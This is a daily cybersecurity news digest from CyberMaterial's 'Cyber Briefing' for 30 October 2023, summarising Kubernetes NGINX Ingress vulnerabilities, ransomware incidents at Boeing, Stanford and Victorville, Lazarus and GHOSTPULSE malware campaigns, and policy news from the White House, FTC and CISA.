Cyber Briefing: 2023.10.30
👉 What's happening in cybersecurity today?
NGINX Ingress, Kubernetes, Hunters International, Hive Ransomware, GHOSTPULSE, MSIX, Windows 11, Microsoft 365, Victorville, California, Boeing, Lazarus, APT38, SIGNBT, North Korea, Kearny Bank, Stanford University, FTC, Gaza, Israel, CISA, Ukraine, Russia, White House, Logging.
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please subscribe.
🚨 Cyber Alerts
Three critical vulnerabilities were disclosed by the Kubernetes security community, all pertaining to the widely-used NGINX Ingress component. These vulnerabilities, identified as CVE-2023-5043, CVE-2023-5044, and CVE-2022-4886, enable attackers to pilfer sensitive credentials from the Kubernetes cluster, including high-privileged access to the Kubernetes API server. Although these attacks are typically challenging for outsiders to perform, they could still occur in certain scenarios, such as multi-tenant clusters and through the injection of malicious configurations.
A new ransomware operation known as Hunters International has surfaced, and it appears to be a possible rebrand of the Hive ransomware. Researchers have identified code overlaps and similarities between the two groups, suggesting a connection. While Hunters International claims they acquired the source code from Hive developers, concerns remain about their motives, as they focus on stealing data for extortion rather than encryption.
A recent cyber attack campaign has been discovered employing MSIX Windows app package files to distribute the GHOSTPULSE malware across Windows systems. MSIX is a format used to package and distribute Windows applications, requiring access to code signing certificates, making it an attractive target for well-resourced groups. This campaign entices potential victims to download the malicious MSIX packages through various techniques, ultimately delivering GHOSTPULSE through a multi-stage process.
Microsoft has enhanced Windows 11's file archive compatibility by adding support for 11 new formats, including RAR, 7-Zip, Tar, and GZ archives. These additions come with the optional KB5031455 Preview cumulative update, although support for password-protected archives is not yet available. The company utilized the open-source libarchive project for this expansion, with plans to potentially introduce more formats in the future, such as LZH and XAR.
Microsoft has released a workaround for a prevalent issue affecting Microsoft 365 users, resulting in 'Something Went Wrong [1001]' sign-in errors and rendering desktop applications, including Excel, Word, Outlook, and PowerPoint, unusable for many customers. This problem has affected users of Microsoft 365 Apps for business, Microsoft 365, and Office apps for iOS and Android. When attempting to sign in to Microsoft 365 desktop applications, users have been encountering error messages.
💥 Cyber Incidents
In Victorville, California, residents were warned about a data breach following a ransomware attack that exposed sensitive information. City officials disclosed that hackers had access to their systems from August 12 to September 26, and the breached data included names, Social Security numbers, driver's license information, medical records, and health insurance policy numbers. While the city has restored some services affected by the attack, web-based systems remain non-functional.
The LockBit ransomware gang has claimed the prestigious aerospace and military contractor, Boeing, as its latest victim. This Russian-linked group made the announcement on its dark web leak site, asserting that they possess a vast trove of sensitive data. Unless Boeing communicates with the ransomware group before November 2nd, 1:23 pm UTC, all this data will be made public. With Boeing and its subsidiaries valued at around $60 billion by the gang, this poses a significant threat to the global aviation and space technology leader.
Recommended by LinkedIn
A report by Kaspersky reveals that the North Korean Lazarus hacking group persistently targeted a software vendor through multiple breaches, with the aim of stealing source code or facilitating a supply chain attack. This campaign, spanning from March to August 2023, demonstrated Lazarus's determination as they continued to exploit software vulnerabilities despite multiple patches and warnings. The attackers deployed SIGNBT malware and LPEClient, an info-stealer and loader, showcasing their sophisticated tactics and the need for organizations to proactively secure their software against such threats.
Kearny Bank, based in New Jersey, disclosed a data breach where credit card numbers and other sensitive client information were exposed due to the MOVEit Transfer attacks. The breach was linked to a zero-day vulnerability exploit affecting Fiserv, a third-party vendor providing financial technology services to the bank. While the bank reassured that its in-house systems were secure, over 17,000 clients were affected, prompting Kearny Bank to provide affected individuals with free credit monitoring, fraud consultation, and identity restoration services for 24 months.
In response to a ransomware gang's claim of an attack on Stanford University, the institution is actively investigating a cybersecurity incident within its Department of Public Safety. The university has stated that they are working to determine the extent of the impact and the investigation is being conducted in collaboration with outside specialists. The Akira ransomware gang, which has targeted various U.S. educational institutions this year, including colleges and K-12 schools, claimed responsibility for the attack and the theft of 430 gigabytes of data, underscoring the growing challenges educational institutions face in the realm of cybersecurity.
📢 Cyber News
The White House is set to issue a sweeping executive order designed to secure the development of advanced artificial intelligence models. President Joe Biden invoked Cold War-era executive powers over private industry to direct developers of AI models to notify the government and share the results of safety tests. The order aims to ensure that generative AI foundation models, which could pose risks to national security and public health, are rigorously tested and adhere to new safety standards.
The Federal Trade Commission (FTC) is broadening the scope of financial data breach reporting requirements to encompass non-banking institutions such as mortgage brokers, auto dealers, and payday lenders. These entities must now report data breaches to the FTC under the revised Safeguards Rule when a third party acquires unauthorized access to the unencrypted records of at least 500 consumers. This rule aims to enhance consumer data protection and will take effect in six months, emphasizing the need for timely disclosure and cybersecurity measures.
Amid Israel's military expansion of its ground operation in Gaza, the region has experienced a severe limitation in internet access, with widespread outages affecting cellular, internet, and other communication services. The Palestine Telecommunications Company, known as Paltel, attributed the outages to the destruction of its infrastructure caused by intense bombing. Internet monitoring organizations have reported that these disruptions mark one of the most significant internet blackouts in Gaza, impacting residents' ability to communicate with the outside world, coordinate evacuations, and access critical emergency services, raising concerns about public safety and healthcare operations.
Ukrainian hackers, known as the IT Army, conducted a distributed denial-of-service (DDoS) attack that disrupted internet services provided by three Russian operators in territories occupied by Russia. The attack impacted cellular networks, phone services, and internet connectivity. This action is part of a broader strategy by Ukraine to hinder enemy military communication in the occupied regions, demonstrating the ongoing cyber conflict in the area.
The Cybersecurity and Infrastructure Security Agency (CISA) has unveiled a new version of Logging Made Easy (LME), offering a user-friendly log management solution for Windows-based devices. LME, inspired by technology from the United Kingdom's National Cyber Security Centre (NCSC), is designed to simplify log management, making it accessible for organizations with limited resources. CISA encourages both public and private entities to enhance their Windows-based device security by utilizing this free, turnkey solution, which builds on the success of the NCSC's previous log management system, now decommissioned.
Subscribe and Comment.
Copyright © 2023 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on: